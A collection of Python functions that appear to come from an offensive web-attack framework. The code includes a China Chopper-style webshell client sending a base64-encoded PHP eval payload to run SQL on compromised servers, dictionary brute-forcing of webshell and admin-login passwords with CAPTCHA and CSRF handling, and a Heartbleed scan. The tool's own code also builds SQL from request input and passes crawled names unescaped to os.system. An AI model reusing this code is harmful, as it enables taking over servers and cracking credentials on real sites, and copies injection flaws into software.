def query(queryString): global mode global httpHeaderContent global dbHost, dbUser, dbPass, dbName, postData, url, chopperPass if mode == 1: postData[ 'z0'] = "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfcXVlcnkoIlNFVCBOQU1FUyB1dGY4Iik7QG15c3FsX3NlbGVjdF9kYigkZGJuKTskcT1AbXlzcWxfcXVlcnkoJHNxbCk7JGk9MDt3aGlsZSgkY29sPUBteXNxbF9maWVsZF9uYW1lKCRxLCRpKSl7ZWNobygkY29sLiJcdHxcdCIpOyRpKys7fWVjaG8oIlxyXG4iKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2ZvcigkYz0wOyRjPCRpOyRjKyspe2VjaG8odHJpbSgkcnNbJGNdKSk7ZWNobygiXHR8XHQiKTt9ZWNobygiXHJcbiIpO31AbXlzcWxfY2xvc2UoJFQpOztlY2hvKCJ8PC0iKTtkaWUoKTs=" postData['z1'] = dbHost postData['z2'] = dbUser postData['z3'] = dbPass postData['z4'] = dbName postData[ chopperPass] = "$xx=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$yy=$_POST;@eval($xx($yy[z0]));" httpHeaderContent = get_random_header() httpHeaderContent['Referer'] = get_http_domain_from_url(url) httpHeaderContent['Content-Type'] = "application/x-www-form-urlencoded" else: postData["z4"] = dbName postData["z5"] = base64.b64encode(queryString.encode(encoding="utf-8")) result = post_requests(url, data=postData, headers=httpHeaderContent) html = result.content.decode("utf8") return html[3:-3]
def targets(request): targetValue = request.GET.get('targetValue') action = request.GET.get('action') if targetValue != None: print(targetValue) if action == "query": result1 = execute_sql_in_db( "select http_domain from %s" % first_targets_table_name, db_name) RESULT1 = "" if len(result1) != 0: for each in result1: RESULT1 += each[0] + "\n" else: RESULT1 = "None\n" result2 = execute_sql_in_db( "select http_domain from %s" % targets_table_name, db_name) RESULT2 = "" if len(result2) != 0: for each in result2: RESULT2 += each[0] + "\n" else: RESULT2 = "None\n" string = "first targets:\n" + RESULT1 + "\n" + "targets:\n" + RESULT2 string = string.replace("\n", "<br>") return HttpResponse(string) elif action == "add": targetValue = get_http_domain_from_url(targetValue) execute_sql_in_db( "insert into %s(http_domain,domain) values('%s','%s')" % (targets_table_name, targetValue, targetValue.split("/")[-1]), db_name) string = "add new target %s for scan successully:D" % targetValue return HttpResponse(string) elif action == "delete": targetValue = get_http_domain_from_url(targetValue) execute_sql_in_db( "DELETE FROM `%s` WHERE http_domain='%s'" % (targets_table_name, targetValue), db_name) string = "delete target %s from db successully:D" % targetValue return HttpResponse(string) else: print("normal visit without action request to targets.html") pass # 下面这句不能少,下面这句是作为没有action[query/add/delete]查询时的正常情况下的显示页面的处理情况 return render(request, "targets.html", {})
def crack_webshell(url, anyway=1): # webshll爆破,第二个参数默认为0,如果设置不为0,则不考虑判断是否是webshll,如果设置为1,直接按direct_bao方式爆破 # 如果设置为2,直接按biaodan_bao方式爆破 figlet2file("cracking webshell", 0, True) print("cracking webshell --> %s" % url) print("正在使用吃奶的劲爆破...") ext = get_webshell_suffix_type(url) tmp = check_webshell_url(url) url_http_domain = get_http_domain_from_url(url) if tmp['y2'] == 'direct_bao' or tmp['y2'] == 'biaodan_bao': pass if anyway == 1 or tmp['y2'] == "direct_bao": return_value = crack_ext_direct_webshell_url( url, ModulePath + "dicts/webshell_passwords.txt", ext) if return_value['cracked'] == 0: print("webshell爆破失败 :(") return "" else: # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应非urls表 # 中的cracked_webshell_urls_info字段中 strings_to_write = "webshell:%s,password:%s" % ( url, return_value['password']) elif anyway == 2 or tmp['y2'] == "biaodan_bao": pass ''' return_value = crack_allext_biaodan_webshell_url( url, ModulePath + "dicts/user.txt", ModulePath + "dicts/webshell_passwords.txt") if return_value['cracked'] == 0: print("webshell爆破失败 :(") return "" else: # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的 # cracked_webshell_urls_info字段中 strings_to_write = "webshell:%s,password:%s" % ( url, return_value['password']) ''' elif tmp['y2'] == "bypass": print( Fore.RED + "congratulations!!! webshell may found and has no password!!!") string = "cracked webshell:%s no password!!!" % url print(Fore.RED + string) # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的 # cracked_webshell_urls_info字段中 strings_to_write = "webshell:%s,password:%s" % ( url, return_value['password']) else: strings_to_write = "这不是一个webshell :(" return strings_to_write
import sys exp10it_module_path = os.path.expanduser("~") + "/mypypi" sys.path.insert(0, exp10it_module_path) from urllib.parse import urlparse from exp10it import get_string_from_command from exp10it import CLIOutput from exp10it import get_target_table_name_list from exp10it import COMMON_NOT_WEB_PORT_LIST from exp10it import get_http_domain_from_url from exp10it import get_target_open_port_list current_dir = os.path.split(os.path.realpath(__file__))[0] target = sys.argv[1] print("checking heartbleed vul for " + target) open_port_list = get_target_open_port_list(target) http_domain = get_http_domain_from_url(target) hostname = urlparse(target).hostname target_table_name = get_target_table_name_list(target)[0] parsed = urlparse(target) open_port_list = get_target_open_port_list(target) if ":" in parsed.netloc: open_port_list.append(parsed.netloc.split(":")[1]) for each in open_port_list: if each not in COMMON_NOT_WEB_PORT_LIST: a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " % (current_dir, each, hostname)) if re.search(r"server is vulnerable", a, re.I): string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % ( hostname, each) CLIOutput().good_print(string_to_write)
def parse_get(self, response): #input(44444444444444) item = CrawlerItem() item['code'] = response.status item['current_url'] = response.url #print(response.url) #input(5555555555555) #print(response.data) #input(3333333333) #if response.url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # print('fail ....................') #if response.url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/index.php": # print('succeed .................') item['resources_file_list'] = [] item['sub_domains_list'] = [] item['like_admin_login_url'] = False item['like_webshell_url'] = False #print(response.text) if response.status == 200: urls = collect_urls_from_html(response.text, response.url) title_list = response.xpath('//title/text()').extract() item['title'] = None if len(title_list) == 0 else title_list[0] item['content'] = response.text else: a = get_request(response.url, cookie=self.cookie) item['title'] = a['title'] item['content'] = a['content'] urls = collect_urls_from_html(a['content'], response.url) #ttt=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=" #if ttt in urls: # print(response.url) # input(333333333333333333) if like_admin_login_content(item['content']): item['like_admin_login_url'] == True if check_url_has_webshell_content(item['current_url'], item['content'], item['code'], item['title'])['y1']: item['like_webshell_url'] == True yield item url_main_target_domain = get_url_belong_main_target_domain( self.start_url) for url in urls: #if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # input(1111111111111) url_templet_list = get_url_templet_list(url) url_http_domain = get_http_domain_from_url(url) if url_is_sub_domain_to_http_domain( url, urlparse(url)[0] + "://" + url_main_target_domain ) and url_http_domain not in item['sub_domains_list']: item['sub_domains_list'].append(url_http_domain) if urlparse(url).hostname != self.domain: continue if url in self.collected_urls: continue _flag = 0 for _ in url_templet_list: if _ in self.collected_urls: _flag = 1 break if _flag == 1: continue self.add_url_templet_to_collected_urls(url) if "^" in url: # post类型url post_url_list = url.split("^") post_url = post_url_list[0] post_data = post_url_list[1] yield SplashRequest(post_url, callback=self.parse_post, endpoint='execute', magic_response=True, meta={ 'handle_httpstatus_all': True, 'current_url': url }, args={ 'lua_source': self.lua_script, 'http_method': 'POST', 'body': post_data }) else: # get类型url #if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # input(9999999999999999) match_resource = re.match(RESOURCE_FILE_PATTERN, url) match_logoff = re.search( r"(logout)|(logoff)|(exit)|(signout)|(signoff)", url, re.I) if match_resource: item['resources_file_list'].append(url) elif match_logoff: pass else: #if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": # input(8888888889999999999999) yield SplashRequest(url, self.parse_get, endpoint='execute', magic_response=True, meta={'handle_httpstatus_all': True}, args={'lua_source': self.lua_script})
def process_item(self, item, spider): current_url = item['current_url'] parsed = urlparse(current_url) hostname = parsed.hostname code = item['code'] title = item['title'] content = item['content'] if "^" in current_url: pure_url = current_url.split("^")[0] else: pure_url = current_url http_domain = get_http_domain_from_url(current_url) main_target_domain = get_url_belong_main_target_domain(pure_url) pang_table_name = main_target_domain.replace(".", "_") + "_pang" sub_table_name = main_target_domain.replace(".", "_") + "_sub" target_table_info = get_target_table_name_info(current_url) if not target_table_info['target_is_pang_or_sub']: url_start_url = get_url_start_url(pure_url) url_table_name = get_start_url_urls_table(url_start_url) else: url_table_name = get_http_domain_from_url(pure_url).split( "/")[-1].replace(".", "_") + "_urls" # 1.write [current_url],[code],[title],[content],[like_admin_login_url],[like_webshell_url] to database primary_key = "url" primary_value = current_url if primary_key == "http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=": input(44444444444444444444444) write_string_to_sql(str(code), DB_NAME, url_table_name, 'code', primary_key, primary_value) write_string_to_sql(title, DB_NAME, url_table_name, 'title', primary_key, primary_value) write_string_to_sql(content, DB_NAME, url_table_name, 'content', primary_key, primary_value) if item['like_admin_login_url']: write_string_to_sql('1', DB_NAME, url_table_name, 'like_admin_login_url', primary_key, primary_value) if item['like_webshell_url']: write_string_to_sql('1', DB_NAME, url_table_name, 'like_webshell_url', primary_key, primary_value) # 2.write [resources_file_list],[like_admin_login_urls] && [like_webshell_urls],[sub_domains_list] to database # write [resources_file_list] if target_table_info['target_is_pang_or_sub'] and not target_table_info[ 'target_is_pang_and_sub']: _table_name = pang_table_name if target_table_info[ 'target_is_only_pang'] else sub_table_name _table_name_list = [_table_name] primary_key = 'http_domain' primary_value = http_domain elif target_table_info['target_is_pang_and_sub']: _table_name_list = [pang_table_name, sub_table_name] primary_key = 'http_domain' primary_value = http_domain elif target_table_info['target_is_main_and_table_is_targets']: _table_name_list = [TARGETS_TABLE_NAME] primary_key = 'start_url' primary_value = url_start_url elif target_table_info['target_is_main_and_table_is_first_targets']: _table_name_list = [FIRST_TARGETS_TABLE_NAME] primary_key = 'start_url' primary_value = url_start_url for each in item['resources_file_list']: for each_table in _table_name_list: auto_write_string_to_sql(each, DB_NAME, each_table, "resource_files", primary_key, primary_value) # write [like_admin_login_urls] and [like_webshell_urls] for each_table in _table_name_list: if item['like_admin_login_url']: auto_write_string_to_sql(current_url, DB_NAME, each_table, "like_admin_login_urls", primary_key, primary_value) if item['like_webshell_url']: auto_write_string_to_sql(current_url, DB_NAME, each_table, "like_webshell_urls", primary_key, primary_value) # write [sub_domains_list] to database if target_table_info['target_is_main']: if not re.match(r"(\d+\.){3}\d+", hostname): _result = execute_sql_in_db( "select http_domain from %s" % sub_table_name, DB_NAME) exist_sub_domains_list = [] for each in _result: exist_sub_domains_list.append(each[0]) for each in item['sub_domains_list']: if each not in exist_sub_domains_list: # write to database sql = "insert ignore into `%s`(http_domain,domain) values('%s','%s')" % ( sub_table_name, each, each.split("/")[-1]) execute_sql_in_db(sql, DB_NAME) # write to config.ini if not os.path.exists(LOG_FOLDER_PATH): os.system("mkdir %s" % LOG_FOLDER_PATH) if not os.path.exists("%s/sub" % LOG_FOLDER_PATH): os.system("cd %s && mkdir sub" % LOG_FOLDER_PATH) os.system("echo %s >> %s" % (each.split("/")[-1], LOG_FOLDER_PATH + "/sub/" + sub_table_name + ".txt")) else: pass return item
def crack_admin_login_url_thread(url,username,password): if get_flag[0] == 1: return try_time[0] += 1 if requestAction=="GET": final_request_url=form_action_url final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" % (user_form_name,username),final_request_url) final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" % (pass_form_name,password),final_request_url) if has_yanzhengma[0]: if needOnlyGetOneYanZhengMa: yanzhengmaValue=onlyOneYanZhengMaValue else: yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src) final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" % (yanzhengma_form_name,yanzhengmaValue),final_request_url) if hasCsrfToken: final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url) html=s.get(final_request_url).text if hasCsrfToken: csrfTokenValue=get_csrf_token_value_from_html(html) currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue else: #post request paramPartValue=form_action_url.split("^")[1] paramList=paramPartValue.split("&") values={} for eachP in paramList: eachPList=eachP.split("=") eachparamName=eachPList[0] eachparamValue=eachPList[1] if eachparamName==user_form_name: eachparamValue=username if eachparamName==pass_form_name: eachparamValue=password values[eachparamName]=eachparamValue if has_yanzhengma[0]: if not needOnlyGetOneYanZhengMa: values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src) else: values[yanzhengma_form_name]=onlyOneYanZhengMaValue if hasCsrfToken: values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1) html = s.post(form_action_url.split("^")[0], values).text if hasCsrfToken: csrfTokenValue=get_csrf_token_value_from_html(html) currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue USERNAME_PASSWORD = "******" + username + ":" + \ password + ")" + (52 - len(password)) * " " # 每100次计算完成任务的平均速度 left_time = get_remain_time( start[0], biaoji_time[0], remain_time[0], 100, try_time[0], sum[0]) remain_time[0] = left_time sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) + '%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD)) sys.stdout.flush() if len(html) > logined_least_length: # 认为登录成功 get_flag[0] = 1 end = time.time() CLIOutput().good_print( "congratulations!!! admin login url cracked succeed!!!", "red") string = "cracked admin login url:%s username and password:(%s:%s)" % ( url, username, password) CLIOutput().good_print(string, "red") return_string[0]=string print("you spend time:" + str(end - start[0])) http_domain_value = get_http_domain_from_url(url) # 经验证terminate()应该只能结束当前线程,不能达到结束所有线程 table_name_list = get_target_table_name_list(http_domain_value) urls_table_name = http_domain_value.split( "/")[-1].replace(".", "_") + "_urls" return {'username': username, 'password': password}